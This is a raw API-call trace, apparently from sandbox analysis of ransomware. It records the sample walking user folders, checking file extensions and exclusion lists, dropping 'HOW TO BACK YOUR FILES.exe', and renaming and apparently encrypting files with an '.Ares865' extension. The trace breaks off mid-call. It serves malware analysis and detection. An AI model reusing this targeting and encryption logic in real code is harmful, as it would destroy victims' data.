lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0040.853] lstrlenW (lpString="4dl") returned 3 [0040.853] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0040.853] lstrlenW (lpString="^^^") returned 3 [0040.853] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0040.853] lstrlenW (lpString="abs") returned 3 [0040.853] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0040.853] lstrlenW (lpString="abx") returned 3 [0040.853] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0040.853] lstrlenW (lpString="accdb") returned 5 [0040.853] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0040.853] lstrlenW (lpString="accdc") returned 5 [0040.853] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0040.853] lstrlenW (lpString="accde") returned 5 [0040.853] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0040.853] lstrlenW (lpString="accdr") returned 5 [0040.853] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0040.853] lstrlenW (lpString="accdt") returned 5 [0040.853] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0040.854] lstrlenW (lpString="accdw") returned 5 [0040.854] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0040.854] lstrlenW (lpString="accft") returned 5 [0040.854] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0040.854] lstrlenW (lpString="adb") returned 3 [0040.854] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0040.854] lstrlenW (lpString="adb") returned 3 [0040.854] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0040.854] lstrlenW (lpString="ade") returned 3 [0040.854] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0040.854] lstrlenW (lpString="adf") returned 3 [0040.854] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0040.854] lstrlenW (lpString="adn") returned 3 [0040.854] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0040.854] lstrlenW (lpString="adp") returned 3 [0040.854] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0040.854] lstrlenW (lpString="alf") returned 3 [0040.854] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0040.854] lstrlenW (lpString="ask") returned 3 [0040.854] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0040.854] lstrlenW (lpString="btr") returned 3 [0040.854] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0040.854] lstrlenW (lpString="cat") returned 3 [0040.854] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0040.854] lstrlenW (lpString="cdb") returned 3 [0040.854] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0040.854] lstrlenW (lpString="ckp") returned 3 [0040.854] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0040.854] lstrlenW (lpString="cma") returned 3 [0040.854] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0040.854] lstrlenW (lpString="cpd") returned 3 [0040.854] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0040.854] lstrlenW (lpString="dacpac") returned 6 [0040.854] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0040.854] lstrlenW (lpString="dad") returned 3 [0040.855] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0040.855] lstrlenW (lpString="dadiagrams") returned 10 [0040.855] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0040.855] lstrlenW (lpString="daschema") returned 8 [0040.855] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0040.855] lstrlenW (lpString="db-journal") returned 10 [0040.855] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0040.855] lstrlenW (lpString="db-shm") returned 6 [0040.855] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0040.855] lstrlenW (lpString="db-wal") returned 6 [0040.855] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0040.855] lstrlenW (lpString="dbc") returned 3 [0040.855] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0040.855] lstrlenW (lpString="dbs") returned 3 [0040.855] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0040.855] lstrlenW (lpString="dbt") returned 3 [0040.855] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0040.855] lstrlenW (lpString="dbv") returned 3 [0040.855] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0040.855] lstrlenW (lpString="dbx") returned 3 [0040.855] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0040.855] lstrlenW (lpString="dcb") returned 3 [0040.855] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0040.855] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\My Documents\\My Music", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\My Documents\\My Music") returned="C:\\Users\\Default User\\My Documents\\My Music" [0040.855] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0040.855] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0040.855] lstrlenW (lpString="C:\\Users\\Default User\\My Documents\\My Music") returned 43 [0040.855] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\My Documents\\My Music" | out: lpString1="C:\\Users\\Default User\\My Documents\\My Music") returned="C:\\Users\\Default User\\My Documents\\My Music" [0040.855] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0040.855] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\My Documents\\My Music\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\my documents\\my music\\how to back your files.exe"), bFailIfExists=1) returned 1 [0040.860] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.860] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\My Documents\\My Music\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49f3b220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49f3b220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccfa8 [0040.860] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.860] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.860] lstrcpyW (in: lpString1=0x2e2e8b8, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0040.860] lstrlenW (lpString="desktop.ini") returned 11 [0040.860] lstrlenW (lpString="Ares865") returned 7 [0040.860] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0040.860] lstrlenW (lpString=".dll") returned 4 [0040.860] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0040.860] lstrlenW (lpString=".lnk") returned 4 [0040.860] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0040.860] lstrlenW (lpString=".ini") returned 4 [0040.860] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0040.860] lstrlenW (lpString=".sys") returned 4 [0040.860] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0040.861] lstrlenW (lpString="desktop.ini") returned 11 [0040.861] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Music", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Music") returned="C:\\Users\\Default User\\Music" [0040.861] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd028 | out: hHeap=0x2b0000) returned 1 [0040.861] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2360 | out: hHeap=0x2b0000) returned 1 [0040.861] lstrlenW (lpString="C:\\Users\\Default User\\Music") returned 27 [0040.861] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Music" | out: lpString1="C:\\Users\\Default User\\Music") returned="C:\\Users\\Default User\\Music" [0040.861] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0040.861] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Music\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\music\\how to back your files.exe"), bFailIfExists=1) returned 0 [0040.861] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0040.861] GetLastError () returned 0x0 [0040.861] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0040.861] ReadFile (in: hFile=0x154, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0040.861] CloseHandle (hObject=0x154) returned 1 [0040.862] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0040.862] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.862] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Music\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49f3b220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49f3b220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd028 [0040.862] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.862] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.862] lstrcpyW (in: lpString1=0x2e2e898, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0040.862] lstrlenW (lpString="desktop.ini") returned 11 [0040.862] lstrlenW (lpString="Ares865") returned 7 [0040.862] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0040.862] lstrlenW (lpString=".dll") returned 4 [0040.862] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0040.862] lstrlenW (lpString=".lnk") returned 4 [0040.862] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0040.862] lstrlenW (lpString=".ini") returned 4 [0040.862] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0040.862] lstrlenW (lpString=".sys") returned 4 [0040.862] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0040.862] lstrlenW (lpString="desktop.ini") returned 11 [0040.862] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings") returned="C:\\Users\\Default User\\Local Settings" [0040.862] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed848 | out: hHeap=0x2b0000) returned 1 [0040.862] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2340 | out: hHeap=0x2b0000) returned 1 [0040.862] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings") returned 36 [0040.862] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings" | out: lpString1="C:\\Users\\Default User\\Local Settings") returned="C:\\Users\\Default User\\Local Settings" [0040.862] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0040.862] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\how to back your files.exe"), bFailIfExists=1) returned 1 [0040.877] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.877] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49f3b220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49f3b220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd028 [0040.878] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.878] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.878] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49f3b220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49f3b220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.879] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.879] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0040.879] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="Application Data" | out: lpString1="Application Data") returned="Application Data" [0040.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2340 [0040.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6c) returned 0x2cb310 [0040.879] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2348 | out: ListHead=0x2e77d0, ListEntry=0x2d2348) returned 0x2d2328 [0040.879] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0040.879] lstrcmpiW (lpString1="History", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.879] lstrcmpiW (lpString1="History", lpString2="aoldtz.exe") returned 1 [0040.879] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="History" | out: lpString1="History") returned="History" [0040.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2360 [0040.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5a) returned 0x2f1fc8 [0040.879] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2368 | out: ListHead=0x2e77d0, ListEntry=0x2d2368) returned 0x2d2348 [0040.879] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x49f3b220, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49f3b220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0040.879] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0040.879] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x66b2700, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x66b2700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xddd35f67, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0xbd7f0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 1 [0040.879] lstrcmpiW (lpString1="IconCache.db", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0040.879] lstrcmpiW (lpString1="IconCache.db", lpString2="aoldtz.exe") returned 1 [0040.879] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="IconCache.db" | out: lpString1="IconCache.db") returned="IconCache.db" [0040.879] lstrlenW (lpString="IconCache.db") returned 12 [0040.879] lstrlenW (lpString="Ares865") returned 7 [0040.879] lstrcmpiW (lpString1="ache.db", lpString2="Ares865") returned -1 [0040.879] lstrlenW (lpString=".dll") returned 4 [0040.879] lstrcmpiW (lpString1="IconCache.db", lpString2=".dll") returned 1 [0040.879] lstrlenW (lpString=".lnk") returned 4 [0040.879] lstrcmpiW (lpString1="IconCache.db", lpString2=".lnk") returned 1 [0040.879] lstrlenW (lpString=".ini") returned 4 [0040.879] lstrcmpiW (lpString1="IconCache.db", lpString2=".ini") returned 1 [0040.879] lstrlenW (lpString=".sys") returned 4 [0040.879] lstrcmpiW (lpString1="IconCache.db", lpString2=".sys") returned 1 [0040.880] lstrlenW (lpString="IconCache.db") returned 12 [0040.880] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\IconCache.db.Ares865") returned 57 [0040.880] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\IconCache.db" (normalized: "c:\\users\\default user\\local settings\\iconcache.db"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\IconCache.db.Ares865" (normalized: "c:\\users\\default user\\local settings\\iconcache.db.ares865"), dwFlags=0x1) returned 1 [0040.882] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\IconCache.db.Ares865" (normalized: "c:\\users\\default user\\local settings\\iconcache.db.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0040.882] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=776176) returned 1 [0040.883] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3440020 [0040.883] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cb388 [0040.883] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0040.883] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0040.884] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0040.884] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0040.885] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xbdaf0, lpName=0x0) returned 0x164 [0040.888] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbdaf0) returned 0x2ad0000 [0041.015] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0041.015] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0041.015] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0041.016] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cb400 [0041.016] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb400 | out: hHeap=0x2b0000) returned 1 [0041.016] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2cb400 [0041.016] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eaf60 [0041.016] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb400 | out: hHeap=0x2b0000) returned 1 [0041.016] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb190 [0041.016] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2cba28 [0041.016] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb190 | out: hHeap=0x2b0000) returned 1 [0041.016] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cba28 | out: hHeap=0x2b0000) returned 1 [0041.016] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf60 | out: hHeap=0x2b0000) returned 1 [0041.016] UnmapViewOfFile (lpBaseAddress=0x2ad0000) returned 1 [0041.039] CloseHandle (hObject=0x164) returned 1 [0041.039] CloseHandle (hObject=0x154) returned 1 [0041.048] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb388 | out: hHeap=0x2b0000) returned 1 [0041.048] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0041.048] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3440020 | out: hHeap=0x2b0000) returned 1 [0041.052] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x184eadb, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0041.052] lstrcmpiW (lpString1="Microsoft", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0041.052] lstrcmpiW (lpString1="Microsoft", lpString2="aoldtz.exe") returned 1 [0041.052] lstrcmpiW (lpString1="Microsoft", lpString2=".") returned 1 [0041.052] lstrcmpiW (lpString1="Microsoft", lpString2="..") returned 1 [0041.052] lstrcmpiW (lpString1="Microsoft", lpString2="windows") returned -1 [0041.052] lstrcmpiW (lpString1="Microsoft", lpString2="bootmgr") returned 1 [0041.052] lstrcmpiW (lpString1="Microsoft", lpString2="temp") returned -1 [0041.052] lstrcmpiW (lpString1="Microsoft", lpString2="pagefile.sys") returned -1 [0041.052] lstrcmpiW (lpString1="Microsoft", lpString2="boot") returned 1 [0041.052] lstrcmpiW (lpString1="Microsoft", lpString2="ids.txt") returned 1 [0041.052] lstrcmpiW (lpString1="Microsoft", lpString2="ntuser.dat") returned -1 [0041.052] lstrcmpiW (lpString1="Microsoft", lpString2="perflogs") returned -1 [0041.052] lstrcmpiW (lpString1="Microsoft", lpString2="MSBuild") returned -1 [0041.052] lstrlenW (lpString="Microsoft") returned 9 [0041.052] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\IconCache.db") returned 49 [0041.052] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="Microsoft" | out: lpString1="Microsoft") returned="Microsoft" [0041.052] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2380 [0041.052] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5e) returned 0x2f2098 [0041.052] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2388 | out: ListHead=0x2e77d0, ListEntry=0x2d2388) returned 0x2d2368 [0041.052] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3b34dcb8, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0041.052] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0041.052] lstrcmpiW (lpString1="Temp", lpString2="aoldtz.exe") returned 1 [0041.053] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0041.053] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0041.053] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0041.053] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0041.053] lstrcmpiW (lpString1="Temp", lpString2="temp") returned 0 [0041.053] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0041.053] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0041.053] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="aoldtz.exe") returned 1 [0041.053] lstrcmpiW (lpString1="Temporary Internet Files", lpString2=".") returned 1 [0041.053] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="..") returned 1 [0041.053] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="windows") returned -1 [0041.053] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="bootmgr") returned 1 [0041.053] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="temp") returned 1 [0041.053] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="pagefile.sys") returned 1 [0041.053] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="boot") returned 1 [0041.053] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="ids.txt") returned 1 [0041.053] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="ntuser.dat") returned 1 [0041.053] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="perflogs") returned 1 [0041.053] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="MSBuild") returned 1 [0041.053] lstrlenW (lpString="Temporary Internet Files") returned 24 [0041.053] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft") returned 46 [0041.053] lstrcpyW (in: lpString1=0x2e2e8aa, lpString2="Temporary Internet Files" | out: 